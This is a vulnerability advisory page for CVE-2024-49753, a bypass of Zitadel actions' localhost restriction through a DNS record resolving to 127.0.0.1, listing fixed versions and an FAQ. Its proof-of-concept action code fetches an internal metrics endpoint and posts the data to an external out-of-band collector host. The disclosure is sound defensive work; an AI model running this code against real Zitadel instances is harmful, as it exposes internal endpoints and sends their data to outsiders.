CVE-2024-49753: Denied Host Validation Bypass in Zitadel Actions

Published Oct 25, 2024
·
Updated

Summary A flaw in the URL validation mechanism of Zitadel actions allows bypassing restrictions intended to block requests to localhost (127.0.0.1). The isHostBlocked check, designed to prevent such requests, can be circumvented by creating a DNS record that resolves to 127.0.0.1. This enables actions to send requests to localhost despite the intended security measures.

Details While attempting to send a request directly to 127.0.0.1 via an action results in an error (see image below), the restriction can be bypassed using a custom DNS record. <img width="781" alt="image" src="https://github.com/user-attachments/assets/6d22dae8-407f-4420-a937-aca53d22d05d">

The relevant action code demonstrates the attempted request to 127.0.0.1: let http = require('zitadel/http') let logger = require("zitadel/log") function makeapicall(ctx, api) { var user = http.fetch('http://127.0.0.1:8080/debug/metrics');

var apir = http.fetch('https://obtjoiwgtaftuhbjugulyolvvxuvuuosq.oast.fun/test', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ 'data': user, }), }); logger.log(apir.body); }

By creating a DNS record that resolves a custom domain to 127.0.0.1 (illustrated below using messwithdns), the action can successfully send the request. !image

The modified action code uses the custom domain instead of 127.0.0.1: let http = require('zitadel/http') let logger = require("zitadel/log") function makeapicall(ctx, api) { var user = http.fetch('http://ok.jelly244.messwithdns.com:8080/debug/metrics');

var apir = http.fetch('https://obtjoiwgtaftuhbjugulyolvvxuvuuosq.oast.fun/test', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ 'user': user, }), }); logger.log(apir.body); }

!image

This demonstrates that data from the /debug/metrics API, intended to be restricted to localhost, can be fetched and sent to an external endpoint. !image

Impact

This vulnerability potentially allows unauthorized access to unsecured internal endpoints, which may contain sensitive information or functionalities. Patches

2.x versions are fixed on >= 2.64.1 2.63.x versions are fixed on >= 2.63.6 2.62.x versions are fixed on >= 2.62.8 2.61.x versions are fixed on >= 2.61.4 2.60.x versions are fixed on >= 2.60.4 2.59.x versions are fixed on >= 2.59.5 2.58.x versions are fixed on >= 2.58.7

Workarounds

There is no workaround since a patch is already available.

Questions

If you have any questions or comments about this advisory, please email us at security@zitadel.com

Credits

Thanks to @prdp1137 for reporting this!

Other sources

Zitadel is open-source identity infrastructure software. Versions prior to 2.64.1, 2.63.6, 2.62.8, 2.61.4, 2.60.4, 2.59.5, and 2.58.7 have a flaw in the URL validation mechanism of Zitadel actions allows bypassing restrictions intended to block requests to localhost (127.0.0.1). The isHostBlocked check, designed to prevent such requests, can be circumvented by creating a DNS record that resolves to 127.0.0.1. This enables actions to send requests to localhost despite the intended security measures. This vulnerability potentially allows unauthorized access to unsecured internal endpoints, which may contain sensitive information or functionalities. Versions 2.64.1, 2.63.6, 2.62.8, 2.61.4, 2.60.4, 2.59.5, and 2.58.7 contain a patch. No known workarounds are available.

— MITRE

Affected Software

16 affected componentsFixes available
go/github.com/zitadel/zitadel>=0.0.0<1.80.0-v2.20.0.20241022141644-79fb4cc1cc6e
1.80.0-v2.20.0.20241022141644-79fb4cc1cc6e
go/github.com/zitadel/zitadel>=1.80.1<2.58.7
2.58.7
go/github.com/zitadel/zitadel<0.0.0-20241022141644-79fb4cc1cc6e
0.0.0-20241022141644-79fb4cc1cc6e
go/github.com/zitadel/zitadel>=2.59.0<2.59.5
2.59.5
go/github.com/zitadel/zitadel>=2.60.0<2.60.4
2.60.4
go/github.com/zitadel/zitadel>=2.61.0<2.61.4
2.61.4
go/github.com/zitadel/zitadel>=2.62.0<2.62.8
2.62.8
go/github.com/zitadel/zitadel>=2.63.0<2.63.6
2.63.6
go/github.com/zitadel/zitadel=2.64.0
2.64.1
ZITADEL ZITADEL<2.58.7
ZITADEL ZITADEL>=2.59.0<2.59.5
ZITADEL ZITADEL>=2.60.0<2.60.4
ZITADEL ZITADEL>=2.61.0<2.61.4
ZITADEL ZITADEL>=2.62.0<2.62.8
ZITADEL ZITADEL>=2.63.0<2.63.6
ZITADEL ZITADEL>=2.64.0<2.64.1

Event History

Oct 25, 2024
CVE Published
via MITRE·02:11 PM
Data Sourced
via MITRE·02:11 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·02:15 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·02:15 PM
Affected Software
Advisory Published
via GitHub·07:29 PM
Data Sourced
via GitHub·07:29 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2024-49753?

CVE-2024-49753 is categorized with a moderate severity due to the potential for bypassing localhost restrictions.

2

How do I fix CVE-2024-49753?

To mitigate CVE-2024-49753, upgrade to Zitadel version 2.58.7 or later, including 2.59.5, 2.60.4, 2.61.4, 2.62.8, 2.63.6, or 2.64.1.

3

What systems are affected by CVE-2024-49753?

CVE-2024-49753 affects Zitadel versions prior to 2.58.7 and includes versions from 2.59.0 up to 2.59.5, among others.

4

What type of vulnerability is CVE-2024-49753?

CVE-2024-49753 is an authorization bypass vulnerability linked to the URL validation mechanism.

5

Can CVE-2024-49753 be exploited remotely?

Yes, CVE-2024-49753 can be exploited remotely, allowing attackers to bypass restrictions on localhost requests.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203